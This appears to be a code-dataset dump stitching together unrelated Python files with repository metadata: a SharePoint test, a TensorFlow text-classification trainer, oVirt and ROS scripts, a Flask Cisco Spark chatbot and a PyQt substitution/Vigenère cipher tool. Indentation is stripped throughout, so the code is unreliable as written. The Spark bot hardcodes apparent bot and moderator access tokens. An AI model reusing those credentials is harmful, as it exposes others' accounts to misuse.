from office365.sharepoint.publishing.video_service_discoverer import VideoServiceDiscoverer
from tests.sharepoint.sharepoint_case import SPTestCase
class TestSPPublishing(SPTestCase):
@classmethod
def setUpClass(cls):
super(TestSPPublishing, cls).setUpClass()
@classmethod
def tearDownClass(cls):
pass
def test1_init_site_page_service(self):
svc = SitePageService(self.client).get().execute_query()
self.assertIsNotNone(svc.resource_path)
def test2_get_site_pages(self):
svc = SitePageService(self.client)
pages = svc.pages().get().execute_query()
self.assertIsInstance(pages, SitePageMetadataCollection)
def test3_get_time_zone(self):
time_zone = SitePageService.get_time_zone(self.client, "Moscow").execute_query()
self.assertIsInstance(time_zone, PrimaryCityTime)
self.assertEqual(time_zone.properties.get("Location"), "Moscow, Russia")
def test4_compute_file_name(self):
result = SitePageService.compute_file_name(self.client, "Test page").execute_query()
self.assertIsNotNone(result.value)
def test5_file_picker_tab_options(self):
result = SitePageService.file_picker_tab_options(self.client).execute_query()
self.assertIsNotNone(result.value)
def test6_org_assets(self):
result = SitePageService.org_assets(self.client).execute_query()
self.assertIsNotNone(result.value)
def test7_get_video_service_manager(self):
discoverer = VideoServiceDiscoverer(self.client).get().execute_query()
self.assertIsNotNone(discoverer.resource_path)
|
mit
| -887,073,155,801,701,000
| 40.173913
| 100
| 0.73548
| false
| 3.772908
| true
| false
| false
|
google/eng-edu
|
ml/guides/text_classification/batch_train_sequence_model.py
|
1
|
6910
|
"""Module to train sequence model with batches of data.
Vectorizes training and validation texts into sequences and uses that for
training a sequence model - a sepCNN model. We use sequence model for text
classification when the ratio of number of samples to number of words per
sample for the given dataset is very large (>~15K). This module is identical to
the `train_sequence_model` module except that we pass the data in batches for
training. This is required when you have a very large dataset that does not fit
into memory.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import time
import tensorflow as tf
import numpy as np
import build_model
import load_data
import vectorize_data
import explore_data
FLAGS = None
# Limit on the number of features. We use the top 20K features.
TOP_K = 20000
def _data_generator(x, y, num_features, batch_size):
"""Generates batches of vectorized texts for training/validation.
# Arguments
x: np.matrix, feature matrix.
y: np.ndarray, labels.
num_features: int, number of features.
batch_size: int, number of samples per batch.
# Returns
Yields feature and label data in batches.
"""
num_samples = x.shape[0]
num_batches = num_samples // batch_size
if num_samples % batch_size:
num_batches += 1
while 1:
for i in range(num_batches):
start_idx = i * batch_size
end_idx = (i + 1) * batch_size
if end_idx > num_samples:
end_idx = num_samples
x_batch = x[start_idx:end_idx]
y_batch = y[start_idx:end_idx]
yield x_batch, y_batch
def batch_train_sequence_model(data,
learning_rate=1e-3,
epochs=1000,
batch_size=128,
blocks=2,
filters=64,
dropout_rate=0.2,
embedding_dim=200,
kernel_size=3,
pool_size=3):
"""Trains sequence model on the given dataset.
# Arguments
data: tuples of training and test texts and labels.
learning_rate: float, learning rate for training model.
epochs: int, number of epochs.
batch_size: int, number of samples per batch.
blocks: int, number of pairs of sepCNN and pooling blocks in the model.
filters: int, output dimension of sepCNN layers in the model.
dropout_rate: float: percentage of input to drop at Dropout layers.
embedding_dim: int, dimension of the embedding vectors.
kernel_size: int, length of the convolution window.
pool_size: int, factor by which to downscale input at MaxPooling layer.
# Raises
ValueError: If validation data has label values which were not seen
in the training data.
"""
# Get the data.
(train_texts, train_labels), (val_texts, val_labels) = data
# Verify that validation labels are in the same range as training labels.
num_classes = explore_data.get_num_classes(train_labels)
unexpected_labels = [v for v in val_labels if v not in range(num_classes)]
if len(unexpected_labels):
raise ValueError('Unexpected label values found in the validation set:'
' {unexpected_labels}. Please make sure that the '
'labels in the validation set are in the same range '
'as training labels.'.format(
unexpected_labels=unexpected_labels))
# Vectorize texts.
x_train, x_val, word_index = vectorize_data.sequence_vectorize(
train_texts, val_texts)
# Number of features will be the embedding input dimension. Add 1 for the
# reserved index 0.
num_features = min(len(word_index) + 1, TOP_K)
# Create model instance.
model = build_model.sepcnn_model(blocks=blocks,
filters=filters,
kernel_size=kernel_size,
embedding_dim=embedding_dim,
dropout_rate=dropout_rate,
pool_size=pool_size,
input_shape=x_train.shape[1:],
num_classes=num_classes,
num_features=num_features)
# Compile model with learning parameters.
if num_classes == 2:
loss = 'binary_crossentropy'
else:
loss = 'sparse_categorical_crossentropy'
optimizer = tf.keras.optimizers.Adam(lr=learning_rate)
model.compile(optimizer=optimizer, loss=loss, metrics=['acc'])
# Create callback for early stopping on validation loss. If the loss does
# not decrease in two consecutive tries, stop training.
callbacks = [tf.keras.callbacks.EarlyStopping(
monitor='val_loss', patience=2)]
# Create training and validation generators.
training_generator = _data_generator(
x_train, train_labels, num_features, batch_size)
validation_generator = _data_generator(
x_val, val_labels, num_features, batch_size)
# Get number of training steps. This indicated the number of steps it takes
# to cover all samples in one epoch.
steps_per_epoch = x_train.shape[0] // batch_size
if x_train.shape[0] % batch_size:
steps_per_epoch += 1
# Get number of validation steps.
validation_steps = x_val.shape[0] // batch_size
if x_val.shape[0] % batch_size:
validation_steps += 1
# Train and validate model.
history = model.fit_generator(
generator=training_generator,
steps_per_epoch=steps_per_epoch,
validation_data=validation_generator,
validation_steps=validation_steps,
callbacks=callbacks,
epochs=epochs,
verbose=2) # Logs once per epoch.
# Print results.
history = history.history
print('Validation accuracy: {acc}, loss: {loss}'.format(
acc=history['val_acc'][-1], loss=history['val_loss'][-1]))
# Save model.
model.save('amazon_reviews_sepcnn_model.h5')
return history['val_acc'][-1], history['val_loss'][-1]
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir', type=str, default='./data',
help='input data directory')
FLAGS, unparsed = parser.parse_known_args()
# Using the Amazon reviews dataset to demonstrate training of
# sequence model with batches of data.
data = load_data.load_amazon_reviews_sentiment_analysis_dataset(
FLAGS.data_dir)
batch_train_sequence_model(data)
|
apache-2.0
| -3,906,409,651,647,072,000
| 37.176796
| 79
| 0.607236
| false
| 4.270705
| false
| false
| false
|
jwmatthews/cloud_forms_and_rhev_scripts
|
list_ips_of_vms.py
|
1
|
1405
|
#! /usr/bin/env python
import os
import sys
try:
from ovirtsdk.api import API
from ovirtsdk.xml import params
except:
print "Please re-run after you have installed 'ovirt-engine-sdk-python'"
print "Example: easy_install ovirt-engine-sdk-python"
sys.exit()
ENV_IP = "OVIRT_IP"
ENV_USERNAME = "OVIRT_USERNAME"
ENV_PASSWORD = "OVIRT_PASSWORD"
def get_all_vms(api):
return api.vms.list()
def print_all_vms(api):
vms = get_all_vms(api)
for vm in vms:
print "Name: %s, IP: %s" % (vm.name, get_guest_ip(vm))
def get_guest_ip(vm):
info = vm.get_guest_info()
if info is None:
return None
return info.get_ips().get_ip()[0].get_address()
if __name__ == "__main__":
for env_var in [ENV_IP, ENV_USERNAME, ENV_PASSWORD]:
if env_var not in os.environ:
print "Please re-run after you have set an environment variable for '%s'" % (env_var)
sys.exit()
ip = os.environ[ENV_IP]
password = os.environ[ENV_PASSWORD]
username = os.environ[ENV_USERNAME]
url = "https://%s" % (ip)
api = API(url=url, username=username, password=password, insecure=True)
if not api:
print "Failed to connect to '%s'" % (url)
sys.exit()
print_all_vms(api)
vms2 = api.vms.list(query='name=CloudForms_JWM')
if vms2:
vm = vms2[0]
print vm.name
print get_guest_ip(vm)
|
gpl-2.0
| 3,157,357,523,736,450,000
| 24.545455
| 97
| 0.6121
| false
| 3.061002
| false
| false
| false
|
ppp2006/runbot_number0
|
neo_questions/iSmarthomeCtrl.py
|
1
|
2532
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
#Copyright (C) 2012-2013 Thecorpora Inc.
#
#This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import rospy
import os
import subprocess
from questions import *
from qbo_smart_home_services.srv import *
def smarthomefenci(sentence,language):
seg_list=[]
seg_list1=jieba.cut(sentence)
for seg in seg_list1:
seg_list.append(seg)
for location in location_list:
if location in seg_list:
param_location = location
print param_location
for device in device_list:
if device in seg_list:
param_device = device
print param_device
for action in action_list:
if action in seg_list:
param_action = action
print param_action
if param_location!="" and param_device!="" and param_action!="":
print "param OK"
def smarthomectrl(sentence,language):
# call "/say" service to speak selected words
rospy.wait_for_service("/smart_home_set_host")
client_sethost = rospy.ServiceProxy("/smart_home_set_host", SetHost)
rospy.wait_for_service("/smart_home_single_ctrl")
client_singlectrl = rospy.ServiceProxy("/smart_home_single_ctrl", SingleCtrl)
# print "sentence:%s"%sentence
# print "language:%s"%language
# sentencelist=sentence.split(' ',2)
# print sentencelist[1]
# txtname=sentencelist[1]
smarthomefenci(sentence,language)
client_sethost("192.168.0.134")
# client_singlectrl("客厅", "吊灯左", "开")
client_singlectrl(param_location, param_device, param_action)
# client_speak("客厅吊灯开")
# rospy.wait_for_service("/qbo_face_recognition/train");
# service_facetrain = rospy.ServiceProxy('/qbo_face_recognition/train', Train)
# res = service_facetrain()
# rospy.loginfo(res.taught)
# return "你好%s,我已经认识你了"%personname
|
lgpl-2.1
| 4,922,438,022,231,389,000
| 41.965517
| 240
| 0.696228
| false
| 3.490196
| false
| false
| false
|
jiherrero4/spark
|
app_local.py
|
1
|
13545
|
#!/usr/bin/env python
# encoding: utf-8
import urllib
import json
import os
import requests
import sys
import webbrowser
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from flask import Flask
from flask import request
from flask import make_response
from flask_restful import Resource, Api
from flaskext.mysql import MySQL
# Flask app should start in global layout
# Flask es un web framework, de forma que podemos programar acciones determinadas basadas
# en que tipo de mensaje web nos llega a nuestra aplicacion
#
#
app = Flask(__name__)
# Utilizamos labels para guardar el identificador de la sala de spark de casa sesión
# Sino lo sabemos vamos a buscarlo..
labels = [["f0b38c60-9a87-11e6-9343-85f91990429b",
"Y2lzY29zcGFyazovL3VzL1JPT00vM2I5OGI5NTMtMGQyNC0zZDY5LWIyNTMtNzkxNzljOWZkNTVj"]]
# Ahora vamos a definir que hacer si nuestra aplicacion recibe un webhook tipo POST
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("PASO1: Request recibido de api.ai:")
# Con indent lo que hacemos es introducir espacios en el formato de salida
# de forma que se lea mejor, no simplemente un texto plano..
print(json.dumps(req, indent=4))
res = processRequest(req)
# Transformo res a un formato json tabulado.
res = json.dumps(res, indent=4)
# print(res)
# La respuesta tiene que ser tipo application/json
# La funcion make_response pertenece a la libreria de Flask
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
# En esta funcion vamos a procesar el mensaje que hemos recibido, webhook (post).
# Lo primero que vamos a buscar es la accion a realizar.
#
#
def processRequest(req):
dato = ""
# Datos de Acceso del Bot: Token del BOT
bot_token = "MDc0OWJkYjgtZWM4Yy00MzgyLThmNDAtNzQ2ZDliMmE1Y2VkMmE5ODM3OWQtMDQ1"
# Datos de Acceso de un moderador, me he puesto a mí por defecto. Es útil ya que el bot tiene ciertas limitaciones
# de acceso a datos (configuradas por seguridad por Cisco)
moderator_token = "YjI2NDhkMTYtYjkxMS00ZGYwLWIxNjQtYzQyYTIwOTVhNWI3NDU0YmY2OTYtZjYx"
if req.get("result").get("action") == "creaSala":
creaSalaSpark(moderator_token)
elif req.get("result").get("action") == "creaGrupo":
creaGrupoSpark()
elif req.get("result").get("action") == "llama":
llamaSala()
elif req.get("result").get("action") == "gestionado":
dato = leeExcel(req)
elif req.get("result").get("action") == "Inventario":
dato = leeInventario(req)
elif req.get("result").get("action") == "Ayuda":
dato = get_room_sessions_id(req, bot_token, moderator_token)
texto = help_definition()
status = post_message_markDown(dato, bot_token,texto)
dato = proporcionaAyuda(req)
elif req.get("result").get("action") == "InformacionSala":
dato = get_room_sessions_id(req,bot_token,moderator_token)
status = post_message(dato, bot_token, "probando")
print (status)
else:
return {}
res = makeWebhookResult(dato)
return res
######################################################################################################################
# Acciones desencadenadas de las peticiones de los clientes
# - Crear una sala.
# - Conseguir información de una base de datos.
# - Mostrar las opciones del asistente.
# - ...
######################################################################################################################
def creaSalaSpark(myToken):
print("funcion creaSalaSpark iniciado")
roomTitle = "PruebaCreacionSala"
headers = {"Authorization": "Bearer " + myToken, "Content-type": "application/json"}
# Define the action to be taken in the HTTP request
roomInfo = {"title": roomTitle}
# Execute HTTP POST request to create the Spark Room
r = requests.post("https://api.ciscospark.com/v1/rooms", headers=headers, json=roomInfo)
print("funcion creaSalaSpark completado")
room = r.json()
def creaGrupoSpark():
print("funcion creaGrupoSpark iniciado")
myToken = "YjI2NDhkMTYtYjkxMS00ZGYwLWIxNjQtYzQyYTIwOTVhNWI3NDU0YmY2OTYtZjYx"
# emailFile = userlist.txt
roomTitle = "Ojete" # second argument
# Read the email file and save the emails in an list
# emails = [line.strip() for line in open(emailFile)]
emails = ["jiherrero@ttrends.es", "fsobrino@ttrends.es", "pmartin@ttrends.es", "jespejo@ttrends.es",
"jmvarelad@gmail.com"]
print("funcion creaGrupoSpark, paso2")
# Define header used for authentication
headers = {"Authorization": "Bearer " + myToken,
"Content-type": "application/json"}
# Define the action to be taken in the HTTP request
roomInfo = {"title": roomTitle}
# Execute HTTP POST request to create the Spark Room
r = requests.post("https://api.ciscospark.com/v1/rooms", headers=headers, json=roomInfo)
room = r.json()
# Print the result of the HTTP POST request
print(room)
for email in emails:
# if it's an blank line don't add:
if email == "": continue
# Set the HTTP request payload (action)
membershipInfo = {"roomId": room["id"],
"personEmail": email}
# Execute HTTP POST request to create the Spark Room
r = requests.post("https://api.ciscospark.com/v1/memberships",
headers=headers, json=membershipInfo)
membership = r.json()
print(membership)
print()
def llamaSala():
new = 2 # open in a new tab, if possible
# open a public URL, in this case, the webbrowser docs
# url = "http://expansion.es"
url = "https://pxdemo.ttrends.es/webapp/#/?conference=jiherrero@ttrends.es"
webbrowser.open(url, new=new)
# Lee informacion de un archivo excel
def leeExcel(req):
# print ("vamos a leer el excel")
valorBuscado = ""
result = req.get("result")
parameters = result.get("parameters")
nombreCliente = parameters.get("Clientes")
tipoInformacion = parameters.get("detalle_de_servicios_gestionados")
scope = ['https://spreadsheets.google.com/feeds']
credentials = ServiceAccountCredentials.from_json_keyfile_name('My Project-e08df21666bc.json', scope)
gc = gspread.authorize(credentials)
wks = gc.open("prueba1")
worksheet = wks.worksheet("gestionados")
cliente = worksheet.find(nombreCliente)
servicio = worksheet.find(tipoInformacion)
column = cliente.col
row = servicio.row
# print("row: ",row, "column: ",column)
valorBuscado = worksheet.cell(row, column).value
print("valor Buscado: ", valorBuscado)
return valorBuscado
def leeInventario(req):
datos_inventario = parameters.get("datos_inventario")
######################################################################################################################
# Funciones sobre salas de Spark
# - Conseguir identificadores de sala
# - Leer mensajes de las salas
# - ...
######################################################################################################################
# El objetivo de esta función es asociar el número de la sesión que nos envía api.ai
# con el identificador de sala de spark (que no envía api.ai)
# Mapeando el id de la sesión con el id de la sala el envio de mensajes a la sala
# puede ser directo y más eficiente.
def get_room_sessions_id(req,bot_token,moderator_token):
sessionId = req.get("sessionId")
for c in range(len(labels)):
if (labels[c][0] == sessionId):
print("ya dispongo del identificador de la sala, lo envio...")
return labels[c][1]
else:
roomId = informacionSala(req,bot_token,moderator_token)
labels.append([sessionId,roomId])
print("Anadiendo un nuevo identificador de sesion: ", sessionId, "-> con roomId: ",roomId)
return roomId
def informacionSala(req,bot_token,moderator_token):
identificador_sala = get_bot_room_id(req,bot_token,moderator_token)
print ("el identificador de esta sala es: ", identificador_sala)
return identificador_sala
def proporcionaAyuda(req):
ayuda = "Esto es una \n prueba"
return ayuda
def get_bot_room_id(req,bot_token,moderator_token):
result = req.get("result")
ultima_peticion= result.get("resolvedQuery")
identificador_sala = get_rooms(ultima_peticion,bot_token,moderator_token)
return identificador_sala
def get_rooms(ultima_peticion,bot_token,moderator_token):
header = {'Authorization': "Bearer "+ bot_token, 'content-type': 'application/json'}
result = requests.get(url='https://api.ciscospark.com/v1/rooms', headers=header)
JSONresponse = result.json()
roomlist_array = []
for EachRoom in JSONresponse['items']:
roomlist_array.append(EachRoom.get('title') + ' ** ' + EachRoom.get('id'))
last_message = get_last_message(EachRoom.get('id'),bot_token,moderator_token)
print("Last Message:", last_message)
if (last_message.__contains__(ultima_peticion)):
return EachRoom.get('id')
return "sala no encontrada"
#print("Rooms:", roomlist_array)
def get_last_message(roomid,bot_token,moderator_token):
num_mensajes = 2
header = {'Authorization': "Bearer "+ bot_token, 'content-type': 'application/json'}
payload = {'roomId': roomid, 'max': num_mensajes}
result = requests.get(url='https://api.ciscospark.com/v1/messages', headers=header,params=payload)
# en caso de fallo en el acceso al último mensaje, es que es una sala grupal, y el bot no tiene permisos para conseguir los mensajes
# tendrá que ser un moderador (no un bot) que este presente en la sala grupal para acceder a los mensajes
if result.status_code != 200:
header = {'Authorization': "Bearer " + moderator_token , 'content-type': 'application/json'}
payload = {'roomId': roomid, 'max': num_mensajes}
result = requests.get(url='https://api.ciscospark.com/v1/messages', headers=header, params=payload)
# si vuelve a fallar, entonces no podemos conseguir la información y por tanto el id de la sala...
if result.status_code != 200:
return ""
JSONresponse = result.json()
messagelist_array = []
#print (JSONresponse)
for EachMessage in JSONresponse['items']:
messagelist_array.append(EachMessage.get('text'))
#print("Messages:",messagelist_array)
return messagelist_array[0]
def get_session_id(req):
session_id = req.get("sessionId")
return session_id
def post_message(roomid,bot_token,text):
header = {'Authorization': "Bearer " + bot_token, 'content-type': 'application/json'}
payload = {'roomId': roomid, 'text': text}
print("RoomId:", roomid)
print("Bottoken: ", bot_token)
result = requests.post(url='https://api.ciscospark.com/v1/messages', headers=header, json=payload)
# en caso de fallo en el acceso al último mensaje, es que es una sala grupal, y el bot no tiene permisos para conseguir los mensajes
# tendrá que ser un moderador (no un bot) que este presente en la sala grupal para acceder a los mensajes
if result.status_code != 200:
return result.json()
print ("RoomId:",roomid)
print ("Bottoken: ", bot_token)
else:
return "mensaje enviado correctamente..."
def post_message_markDown(roomid,bot_token,markdown):
header = {'Authorization': "Bearer " + bot_token, 'content-type': 'application/json'}
payload = {'roomId': roomid, 'markdown': markdown}
print("RoomId:", roomid)
print("Bottoken: ", bot_token)
result = requests.post(url='https://api.ciscospark.com/v1/messages', headers=header, json=payload)
# en caso de fallo en el acceso al último mensaje, es que es una sala grupal, y el bot no tiene permisos para conseguir los mensajes
# tendrá que ser un moderador (no un bot) que este presente en la sala grupal para acceder a los mensajes
if result.status_code != 200:
return result.json()
print ("RoomId:",roomid)
print ("Bottoken: ", bot_token)
else:
return "mensaje enviado correctamente..."
######################################################################################################################
# Definicion de opciones y dialogos con los clientes
# - Mensaje de ayuda
# - Mensaje por defecto en caso de no encontrar la respuesta.
######################################################################################################################
# Definición de las opciones de ayuda.
def help_definition():
text = "Hola, soy Andy! \nEstos son los temas sobre los que te puedo ayudar: \n 1. **Informes de estadisticas.**\n 2. **Informacion de inventario** \n 3. **Actas de reuniones**\n 4. **Soporte Techno Trends**"
return text
def makeWebhookResult(data):
# print ("preparando el mensaje de vuelta")
if data is None or data == "":
speech = "no he encontrado lo que me pides, por favor especifica mas tu peticion..."
else:
speech = data
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
"source": "from spark"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=False, port=port, host='0.0.0.0')
|
apache-2.0
| 2,362,968,916,008,415,000
| 33.771208
| 212
| 0.640766
| false
| 3.222778
| false
| false
| false
|
wxgeo/geophar
|
wxgeometrie/modules/cryptographie/__init__.py
|
1
|
12975
|
# -*- coding: utf-8 -*-
##--------------------------------------#######
# Cryptographie #
##--------------------------------------#######
# WxGeometrie
# Dynamic geometry, graph plotter, and more for french mathematic teachers.
# Copyright (C) 2005-2013 Nicolas Pourcelot
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from string import ascii_uppercase as majuscules
from functools import partial
from random import shuffle
import re
from PyQt5.QtWidgets import QVBoxLayout, QInputDialog, QPushButton,\
QTextEdit, QGridLayout, QLabel, QLineEdit, QSpacerItem
from PyQt5.QtCore import Qt, QTimer
from ...GUI.menu import MenuBar
from ...GUI.panel import Panel_simple
from ...pylib import print_error
#~ from ... import param
dict_accents = {
"é": "E",
"É": "E",
"ê": "E",
"Ê": "E",
"è": "E",
"È": "E",
"à": "A",
"À": "A",
"â": "A",
"Â": "A",
"ô": "O",
"Ô": "O",
"î": "I",
"Î": "I",
"ù": "U",
"Ù": "U",
"û": "U",
"Û": "U",
"ç": "C",
"Ç": "C",
}
class CaseLettre(QLineEdit):
def __init__(self, parent):
self.parent = parent
QLineEdit.__init__(self, parent)
self.setAlignment(Qt.AlignCenter)
def keyPressEvent(self, evt):
self.parent.message('')
n = evt.key()
if 65 <= n <= 90 or 97 <= n <= 122:
c = chr(n).upper()
for case in self.parent.cases.values():
if case.text() == c:
self.parent.message('La lettre %s est déjà utilisée !' %c)
return
self.setText(c)
elif n in (Qt.Key_Backspace, Qt.Key_Delete):
self.clear()
##QLineEdit.keyPressEvent(self, evt)
class CryptographieMenuBar(MenuBar):
def __init__(self, panel):
MenuBar.__init__(self, panel)
self.ajouter("Fichier", ["quitter"])
self.ajouter("Affichage", ["onglet"], ["plein_ecran"])
self.ajouter("Outils",
["Coder un message", "Code le message par substitution mono-alphabétique.",
"Ctrl+K", panel.coder],
["Coder avec espaces", "Code le message en conservant les espaces (substitution mono-alphabétique).",
"Ctrl+Shift+K", partial(panel.coder, espaces=True)],
["Générer une nouvelle clé", "Générer une nouvelle permutation de l'alphabet.", None, panel.generer_cle],
["Modifier la clé", "Générer une nouvelle permutation de l'alphabet.", None, panel.DlgModifierCle],
None,
["Coder avec Vigenère", "Codage par la méthode de Vigenère (substitution poly-alphabétique).",
None, partial(panel.coder_vigenere, ask=True)],
None,
["options"])
self.ajouter("avance2")
self.ajouter("?")
class Cryptographie(Panel_simple):
titre = "Cryptographie" # Donner un titre à chaque module
def __init__(self, *args, **kw):
Panel_simple.__init__(self, *args, **kw)
self._freeze = False
self.widget_modifie = None
# La clé est la permutation de l'alphabet actuellement utilisée
# pour le codage par substitution mono-alphabétique.
self.generer_cle()
# La clé de chiffrement pour le codage par substitution poly-alphabétique
# (appelé aussi chiffre de Vigenère).
self.cle_vigenere = 'EXEMPLE'
# Signe indiquant un caractère non déchiffré
self.symbole = '-' # '.'
self.sizer = QVBoxLayout()
self.textes = QGridLayout()
self.textes.setSpacing(5)
size = (400, 300)
txt_clair = QLabel("<b>Texte en clair</b>")
self.clair = QTextEdit()
self.clair.setMinimumSize(*size)
formater_clair = partial(self.formater, widget=self.clair)
self.clair.textChanged.connect(formater_clair)
self.clair.cursorPositionChanged.connect(formater_clair)
self.copier_clair = QPushButton('Copier le texte en clair')
self.copier_clair.clicked.connect(partial(self.copier, widget=self.clair))
txt_code = QLabel("<b>Texte codé</b>")
self.code = QTextEdit()
self.code.setMinimumSize(*size)
self.code.textChanged.connect(self.code_modifie)
self.code.cursorPositionChanged.connect(partial(self.formater, widget=self.code))
self.copier_code = QPushButton('Copier le texte codé')
self.copier_code.clicked.connect(partial(self.copier, widget=self.code))
self.textes.addWidget(txt_clair, 0, 0)
self.textes.addItem(QSpacerItem(50, 1), 0, 1)
self.textes.addWidget(txt_code, 0, 2)
self.textes.addWidget(self.clair, 1, 0)
self.textes.addWidget(self.code, 1, 2)
self.textes.addWidget(self.copier_code, 2, 2)
self.textes.addWidget(self.copier_clair, 2, 0)
self.table = QGridLayout()
self.table.setSpacing(3)
self.cases = {}
self.table.addWidget(QLabel("Codé : ", self), 0, 0)
self.table.addWidget(QLabel("Clair : ", self), 1, 0)
##self.table.setColumnStretch(0, 100)
for i, l in enumerate(majuscules):
lettre = QLineEdit(l, self)
lettre.setAlignment(Qt.AlignCenter)
lettre.setReadOnly(True)
lettre.setEnabled(False)
self.table.addWidget(lettre, 0, i + 1)
##self.table.setColumnStretch(i + 1, 1)
for i, l in enumerate(majuscules):
c = self.cases[l] = CaseLettre(self)
c.setMaxLength(1)
self.table.addWidget(c, 1, i + 1)
c.textChanged.connect(self.decoder)
self.sizer.addLayout(self.textes)
self.sizer.addLayout(self.table)
self.setLayout(self.sizer)
##self.adjustSize()
self.couleur1 = "5A28BE" # sky blue
self.couleur2 = "C86400" # Lime Green
self.couleur_position = "FFCDB3"
self.reg = re.compile("([-A-Za-z]|<##>|</##>)+")
##couleur_position = wx.Color(255, 205, 179) # FFCDB3
##couleur1 = wx.Color(90, 40, 190) # 5A28BE
##couleur2 = wx.Color(200, 100, 0) # C86400
##black = wx.Color(0, 0, 0) # 000000
##white = wx.Color(255, 255, 255) # FFFFFF
##self.special = wx.TextAttr(wx.NullColour, couleur_position)
##self.fond = wx.TextAttr(couleur1, wx.NullColour) #"sky blue"
##self.fond2 = wx.TextAttr(couleur2, wx.NullColour) # "Lime Green"
##self.defaut = wx.TextAttr(black, white)
##
##self.Bind(wx.EVT_IDLE, self.OnIdle)
timer = QTimer(self)
timer.timeout.connect(self.OnIdle)
timer.start(100)
# DEBUG:
##self.code.setPlainText('WR IRAMXPZRHRDZ IK HRYYOVR AL IRYYBKY RYZ NOALWLZR POM WR NOLZ FKR W BD O VOMIR WRY YLVDRY IR PBDAZKOZLBD RZ WRY RYPOARY RDZMR WRY HBZY OWBMY FKR I QOELZKIR BD VMBKPR WRY WRZZMRY ALDF POM ALDF')
def copier(self, evt=None, widget=None):
self.vers_presse_papier(widget.toPlainText())
def DlgModifierCle(self, evt=None):
while True:
text, ok = QInputDialog.getText(self, "Modifier la clé",
"La clé doit être une permutation de l'alphabet,\n"
"ou un chiffre qui indique de combien l'alphabet est décalé.",
text=str(self.cle))
if ok:
try:
self.modifier_cle(text)
except:
print_error()
continue
break
def generer_cle(self):
l = list(majuscules)
shuffle(l)
self.cle = ''.join(l)
def modifier_cle(self, cle):
cle = cle.strip().upper()
if cle.isdigit():
n = int(cle)
cle = majuscules[n:] + majuscules[:n]
# On teste qu'il s'agit bien d'une permutation de l'alphabet:
assert ''.join(sorted(cle)) == majuscules
self.cle = cle
def coder(self, evt=None, cle=None, espaces=False):
cle = (self.cle if cle is None else cle)
clair = self.clair.toPlainText().upper()
for key, val in dict_accents.items():
clair = clair.replace(key, val)
d = dict(zip(majuscules, cle))
code = ''.join(d.get(s, ' ') for s in clair)
code = re.sub(' +', ' ', code)
if not espaces:
code = code.replace(' ', '')
self.code.setPlainText(code)
return code
@staticmethod
def _vigenere(l1, l2):
return chr((ord(l1) + ord(l2) - 130)%26 + 65)
def coder_vigenere(self, evt=None, msg=None, cle=None, ask=False):
def gen():
length = len(cle)
n = 0
for car in clair:
if car.isalpha():
yield self._vigenere(cle[n%length], car)
n += 1
else:
yield car
if ask:
self.DlgModifierCleVigenere()
if cle is None:
cle = self.cle_vigenere
if msg is None:
msg = self.clair.toPlainText()
msg = msg.upper()
if cle is None:
pass
# Pour l'instant, les espaces ne sont pas supportés
clair = msg.replace(' ', '')
clair = self.clair.toPlainText().upper()
for key, val in dict_accents.items():
clair = clair.replace(key, val)
code = ''.join(gen())
self.code.setPlainText(code)
return code
def DlgModifierCleVigenere(self, evt=None):
while True:
text, ok = QInputDialog.getText(self, "Modifier la clé pour Vigenère",
"La clé doit contenir uniquement des lettres.",
text=self.cle_vigenere)
if ok:
text = text.strip()
if not text.isalpha():
continue
self.cle_vigenere = text.upper()
break
def decoder(self, txt=None):
code = self.code.toPlainText().upper()
def f(s):
if s in majuscules:
return self.cases[s].text() or self.symbole
return s
clair = ''.join(f(s) for s in code)
self.clair.setPlainText(clair)
def code_modifie(self, txt=None):
self.decoder(txt)
self.formater(txt, widget=self.code)
def formater(self, evt=None, widget=None):
##evt.Skip()
if self._freeze:
return
self.widget_modifie = widget
def _formater(self, widget_modifie):
# Impossible de formater les 2 textes de la même manière s'ils
# ne sont pas de la même longueur.
# Cela ne devrait se produire que temporairement (par ex.,
# l'utilisateur copie un nouveau texte)
if len(self.code.toPlainText()) != len(self.clair.toPlainText()):
if self.code.toPlainText() and self.clair.toPlainText():
print('Warning: le message codé et le message en clair ne sont '
'pas de même longueur.')
return
def colorier(m, col1=[self.couleur1], col2=[self.couleur2]):
s = m.group(0)
s = "<font color='#%s'>%s</font>" % (col1[0], s)
col1[0], col2[0] = col2[0], col1[0]
return s
self._freeze = True
pos = widget_modifie.textCursor().position()
for w in (self.code, self.clair):
txt = w.toPlainText()
if pos != len(txt):
txt = txt[:pos] + '<##>' + txt[pos] + '</##>' + txt[pos + 1:]
new_txt = re.sub(self.reg, colorier, txt)
new_txt = new_txt.replace("<##>",
"<font style='background-color: #%s;'>" % self.couleur_position)
new_txt = new_txt.replace("</##>", "</font>")
w.setHtml(new_txt)
cursor = widget_modifie.textCursor()
cursor.setPosition(pos)
widget_modifie.setTextCursor(cursor)
self._freeze = False
self.widget_modifie = None
def OnIdle(self, evt=None):
if self.widget_modifie is not None and not self.parent.parent.closing:
self._formater(self.widget_modifie)
|
gpl-2.0
| 2,154,801,898,003,441,000
| 35.061453
| 228
| 0.562974
| false
| 3.334194
| false
| false
| false
|
mabuchilab/QNET
|
